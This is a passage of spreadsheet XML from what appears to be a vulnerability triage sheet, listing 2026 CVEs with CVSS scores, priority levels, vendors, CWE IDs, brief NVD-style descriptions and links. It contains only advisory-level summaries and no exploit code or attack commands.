CWE-73</t></is></c><c r="S92" s="5" t="inlineStr"><is><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is></c><c r="T92" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t></is></c></row><row r="93"><c r="A93" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B93" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C93" s="5" t="inlineStr"><is><t>CVE-2026-66768</t></is></c><c r="D93" s="5" t="n"><v>9</v></c><c r="E93" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F93" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G93" s="5" t="inlineStr" /><c r="H93" s="5" t="n"><v>0.003</v></c><c r="I93" s="5" t="inlineStr" /><c r="J93" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K93" s="5" t="inlineStr" /><c r="L93" s="5" t="inlineStr" /><c r="M93" s="5" t="inlineStr" /><c r="N93" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O93" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P93" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q93" s="5" t="inlineStr" /><c r="R93" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="S93" s="5" t="inlineStr"><is><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is></c><c r="T93" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t></is></c></row><row r="94"><c r="A94" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B94" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C94" s="5" t="inlineStr"><is><t>CVE-2026-69854</t></is></c><c r="D94" s="5" t="n"><v>9</v></c><c r="E94" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F94" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G94" s="5" t="inlineStr" /><c r="H94" s="5" t="n"><v>0.006</v></c><c r="I94" s="5" t="inlineStr" /><c r="J94" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K94" s="5" t="inlineStr" /><c r="L94" s="5" t="inlineStr" /><c r="M94" s="5" t="inlineStr" /><c r="N94" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P94" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q94" s="5" t="inlineStr" /><c r="R94" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S94" s="5" t="inlineStr"><is><t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T94" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t></is></c></row><row r="95"><c r="A95" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B95" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C95" s="5" t="inlineStr"><is><t>CVE-2026-85982</t></is></c><c r="D95" s="5" t="n"><v>9</v></c><c r="E95" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F95" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G95" s="5" t="inlineStr" /><c r="H95" s="5" t="n"><v>0.002</v></c><c r="I95" s="5" t="inlineStr" /><c r="J95" s="5" t="inlineStr" /><c r="K95" s="5" t="inlineStr" /><c r="L95" s="5" t="inlineStr" /><c r="M95" s="5" t="inlineStr" /><c r="N95" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O95" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P95" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q95" s="5" t="inlineStr" /><c r="R95" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S95" s="5" t="inlineStr"><is><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is></c><c r="T95" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t></is></c></row><row r="96"><c r="A96" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B96" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C96" s="5" t="inlineStr"><is><t>CVE-2026-50093</t></is></c><c r="D96" s="5" t="n"><v>8.9</v></c><c r="E96" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F96" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G96" s="5" t="inlineStr" /><c r="H96" s="5" t="n"><v>0.002</v></c><c r="I96" s="5" t="inlineStr" /><c r="J96" s="5" t="inlineStr" /><c r="K96" s="5" t="inlineStr" /><c r="L96" s="5" t="inlineStr" /><c r="M96" s="5" t="inlineStr" /><c r="N96" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q96" s="5" t="inlineStr" /><c r="R96" s="5" t="inlineStr"><is><t>CWE-434</t></is></c><c r="S96" s="5" t="inlineStr"><is><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is></c><c r="T96" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t></is></c></row><row r="97"><c r="A97" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B97" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C97" s="5" t="inlineStr"><is><t>CVE-2026-12648</t></is></c><c r="D97" s="5" t="n"><v>8.800000000000001</v></c><c r="E97" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F97" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G97" s="5" t="inlineStr" /><c r="H97" s="5" t="n"><v>0.015</v></c><c r="I97" s="5" t="inlineStr" /><c r="J97" s="5" t="inlineStr" /><c r="K97" s="5" t="inlineStr" /><c r="L97" s="5" t="inlineStr" /><c r="M97" s="5" t="inlineStr" /><c r="N97" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O97" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P97" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q97" s="5" t="inlineStr" /><c r="R97" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S97" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T97" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t></is></c></row><row r="98"><c r="A98" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B98" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C98" s="5" t="inlineStr"><is><t>CVE-2026-12651</t></is></c><c r="D98" s="5" t="n"><v>8.800000000000001</v></c><c r="E98" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F98" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G98" s="5" t="inlineStr" /><c r="H98" s="5" t="n"><v>0.015</v></c><c r="I98" s="5" t="inlineStr" /><c r="J98" s="5" t="inlineStr" /><c r="K98" s="5" t="inlineStr" /><c r="L98" s="5" t="inlineStr" /><c r="M98" s="5" t="inlineStr" /><c r="N98" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O98" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P98" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q98" s="5" t="inlineStr" /><c r="R98" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S98" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T98" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t></is></c></row><row r="99"><c r="A99" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B99" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C99" s="5" t="inlineStr"><is><t>CVE-2026-16502</t></is></c><c r="D99" s="5" t="n"><v>8.800000000000001</v></c><c r="E99" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F99" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G99" s="5" t="inlineStr" /><c r="H99" s="5" t="n"><v>0.005</v></c><c r="I99" s="5" t="inlineStr" /><c r="J99" s="5" t="inlineStr" /><c r="K99" s="5" t="inlineStr" /><c r="L99" s="5" t="inlineStr" /><c r="M99" s="5" t="inlineStr" /><c r="N99" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q99" s="5" t="inlineStr" /><c r="R99" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S99" s="5" t="inlineStr"><is><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is></c><c r="T99" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t></is></c></row><row r="100"><c r="A100" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C100" s="5" t="inlineStr"><is><t>CVE-2026-18851</t></is></c><c r="D100" s="5" t="n"><v>8.800000000000001</v></c><c r="E100" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F100" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G100" s="5" t="inlineStr" /><c r="H100" s="5" t="n"><v>0.01</v></c><c r="I100" s="5" t="inlineStr" /><c r="J100" s="5" t="inlineStr" /><c r="K100" s="5" t="inlineStr"><is><t>ivanti:endpoint_manager_mobile</t></is></c><c r="L100" s="5" t="inlineStr" /><c r="M100" s="5" t="inlineStr" /><c r="N100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P100" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q100" s="5" t="inlineStr" /><c r="R100" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S100" s="5" t="inlineStr"><is><t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t></is></c><c r="T100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t></is></c></row><row r="101"><c r="A101" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C101" s="5" t="inlineStr"><is><t>CVE-2026-28609</t></is></c><c r="D101" s="5" t="n"><v>8.800000000000001</v></c><c r="E101" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F101" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G101" s="5" t="inlineStr" /><c r="H101" s="5" t="n"><v>0.003</v></c><c r="I101" s="5" t="inlineStr" /><c r="J101" s="5" t="inlineStr" /><c r="K101" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L101" s="5" t="inlineStr" /><c r="M101" s="5" t="inlineStr" /><c r="N101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P101" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q101" s="5" t="inlineStr" /><c r="R101" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S101" s="5" t="inlineStr"><is><t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t></is></c></row><row r="102"><c r="A102" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C102" s="5" t="inlineStr"><is><t>CVE-2026-28618</t></is></c><c r="D102" s="5" t="n"><v>8.800000000000001</v></c><c r="E102" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F102" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G102" s="5" t="inlineStr" /><c r="H102" s="5" t="n"><v>0.003</v></c><c r="I102" s="5" t="inlineStr" /><c r="J102" s="5" t="inlineStr" /><c r="K102" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L102" s="5" t="inlineStr" /><c r="M102" s="5" t="inlineStr" /><c r="N102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P102" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q102" s="5" t="inlineStr" /><c r="R102" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S102" s="5" t="inlineStr"><is><t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t></is></c></row><row r="103"><c r="A103" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C103" s="5" t="inlineStr"><is><t>CVE-2026-28666</t></is></c><c r="D103" s="5" t="n"><v>8.800000000000001</v></c><c r="E103" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F103" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G103" s="5" t="inlineStr" /><c r="H103" s="5" t="n"><v>0.003</v></c><c r="I103" s="5" t="inlineStr" /><c r="J103" s="5" t="inlineStr" /><c r="K103" s="5" t="inlineStr" /><c r="L103" s="5" t="inlineStr" /><c r="M103" s="5" t="inlineStr" /><c r="N103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P103" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q103" s="5" t="inlineStr" /><c r="R103" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S103" s="5" t="inlineStr"><is><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is></c><c r="T103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t></is></c></row><row r="104"><c r="A104" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C104" s="5" t="inlineStr"><is><t>CVE-2026-30754</t></is></c><c r="D104" s="5" t="n"><v>8.800000000000001</v></c><c r="E104" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F104" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G104" s="5" t="inlineStr" /><c r="H104" s="5" t="n"><v>0.003</v></c><c r="I104" s="5" t="inlineStr" /><c r="J104" s="5" t="inlineStr" /><c r="K104" s="5" t="inlineStr" /><c r="L104" s="5" t="inlineStr" /><c r="M104" s="5" t="inlineStr" /><c r="N104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P104" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q104" s="5" t="inlineStr" /><c r="R104" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S104" s="5" t="inlineStr"><is><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is></c><c r="T104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t></is></c></row><row r="105"><c r="A105" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C105" s="5" t="inlineStr"><is><t>CVE-2026-49879</t></is></c><c r="D105" s="5" t="n"><v>8.800000000000001</v></c><c r="E105" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F105" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G105" s="5" t="inlineStr" /><c r="H105" s="5" t="n"><v>0.003</v></c><c r="I105" s="5" t="inlineStr" /><c r="J105" s="5" t="inlineStr" /><c r="K105" s="5" t="inlineStr" /><c r="L105" s="5" t="inlineStr" /><c r="M105" s="5" t="inlineStr" /><c r="N105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P105" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q105" s="5" t="inlineStr" /><c r="R105" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S105" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t></is></c></row><row r="106"><c r="A106" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C106" s="5" t="inlineStr"><is><t>CVE-2026-49882</t></is></c><c r="D106" s="5" t="n"><v>8.800000000000001</v></c><c r="E106" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F106" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G106" s="5" t="inlineStr" /><c r="H106" s="5" t="n"><v>0.003</v></c><c r="I106" s="5" t="inlineStr" /><c r="J106" s="5" t="inlineStr" /><c r="K106" s="5" t="inlineStr" /><c r="L106" s="5" t="inlineStr" /><c r="M106" s="5" t="inlineStr" /><c r="N106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P106" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q106" s="5" t="inlineStr" /><c r="R106" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S106" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t></is></c></row><row r="107"><c r="A107" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C107" s="5" t="inlineStr"><is><t>CVE-2026-62706</t></is></c><c r="D107" s="5" t="n"><v>8.800000000000001</v></c><c r="E107" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F107" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G107" s="5" t="inlineStr" /><c r="H107" s="5" t="n"><v>0.006</v></c><c r="I107" s="5" t="inlineStr" /><c r="J107" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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7" s="5" t="inlineStr" /><c r="M107" s="5" t="inlineStr" /><c r="N107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P107" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q107" s="5" t="inlineStr" /><c r="R107" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="S107" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t></is></c></row><row r="108"><c r="A108" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C108" s="5" t="inlineStr"><is><t>CVE-2026-62744</t></is></c><c r="D108" s="5" t="n"><v>8.800000000000001</v></c><c r="E108" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F108" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G108" s="5" t="inlineStr" /><c r="H108" s="5" t="n"><v>0.008</v></c><c r="I108" s="5" t="inlineStr" /><c r="J108" s="5" t="inlineStr" /><c r="K108" s="5" t="inlineStr" /><c r="L108" s="5" t="inlineStr" /><c r="M108" s="5" t="inlineStr" /><c r="N108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P108" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q108" s="5" t="inlineStr" /><c r="R108" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S108" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t></is></c></row><row r="109"><c r="A109" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C109" s="5" t="inlineStr"><is><t>CVE-2026-62895</t></is></c><c r="D109" s="5" t="n"><v>8.800000000000001</v></c><c r="E109" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F109" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G109" s="5" t="inlineStr" /><c r="H109" s="5" t="n"><v>0.007</v></c><c r="I109" s="5" t="inlineStr" /><c r="J109" s="5" t="inlineStr" /><c r="K109" s="5" t="inlineStr" /><c r="L109" s="5" t="inlineStr" /><c r="M109" s="5" t="inlineStr" /><c r="N109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P109" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q109" s="5" t="inlineStr" /><c r="R109" s="5" t="inlineStr"><is><t>CWE-1390, CWE-89, CWE-942</t></is></c><c r="S109" s="5" t="inlineStr"><is><t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t></is></c></row><row r="110"><c r="A110" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C110" s="5" t="inlineStr"><is><t>CVE-2026-65772</t></is></c><c r="D110" s="5" t="n"><v>8.800000000000001</v></c><c r="E110" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F110" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G110" s="5" t="inlineStr" /><c r="H110" s="5" t="n"><v>0.008999999999999999</v></c><c r="I110" s="5" t="inlineStr" /><c r="J110" s="5" t="inlineStr" /><c r="K110" s="5" t="inlineStr" /><c r="L110" s="5" t="inlineStr" /><c r="M110" s="5" t="inlineStr" /><c r="N110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P110" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q110" s="5" t="inlineStr" /><c r="R110" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S110" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="T110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t></is></c></row><row r="111"><c r="A111" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C111" s="5" t="inlineStr"><is><t>CVE-2026-66814</t></is></c><c r="D111" s="5" t="n"><v>8.800000000000001</v></c><c r="E111" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G111" s="5" t="inlineStr" /><c r="H111" s="5" t="n"><v>0.004</v></c><c r="I111" s="5" t="inlineStr" /><c r="J111" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K111" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L111" s="5" t="inlineStr" /><c r="M111" s="5" t="inlineStr" /><c r="N111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P111" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q111" s="5" t="inlineStr" /><c r="R111" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S111" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t></is></c></row><row r="112"><c r="A112" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C112" s="5" t="inlineStr"><is><t>CVE-2026-66818</t></is></c><c r="D112" s="5" t="n"><v>8.800000000000001</v></c><c r="E112" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G112" s="5" t="inlineStr" /><c r="H112" s="5" t="n"><v>0.006</v></c><c r="I112" s="5" t="inlineStr" /><c r="J112" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K112" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L112" s="5" t="inlineStr" /><c r="M112" s="5" t="inlineStr" /><c r="N112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P112" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q112" s="5" t="inlineStr" /><c r="R112" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S112" s="5" t="inlineStr"><is><t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t></is></c></row><row r="113"><c r="A113" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C113" s="5" t="inlineStr"><is><t>CVE-2026-66819</t></is></c><c r="D113" s="5" t="n"><v>8.800000000000001</v></c><c r="E113" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G113" s="5" t="inlineStr" /><c r="H113" s="5" t="n"><v>0.007</v></c><c r="I113" s="5" t="inlineStr" /><c r="J113" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K113" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L113" s="5" t="inlineStr" /><c r="M113" s="5" t="inlineStr" /><c r="N113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P113" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q113" s="5" t="inlineStr" /><c r="R113" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S113" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t></is></c></row><row r="114"><c r="A114" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C114" s="5" t="inlineStr"><is><t>CVE-2026-66820</t></is></c><c r="D114" s="5" t="n"><v>8.800000000000001</v></c><c r="E114" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G114" s="5" t="inlineStr" /><c r="H114" s="5" t="n"><v>0.005</v></c><c r="I114" s="5" t="inlineStr" /><c r="J114" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K114" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L114" s="5" t="inlineStr" /><c r="M114" s="5" t="inlineStr" /><c r="N114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P114" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q114" s="5" t="inlineStr" /><c r="R114" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S114" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t></is></c></row><row r="115"><c r="A115" s="5" 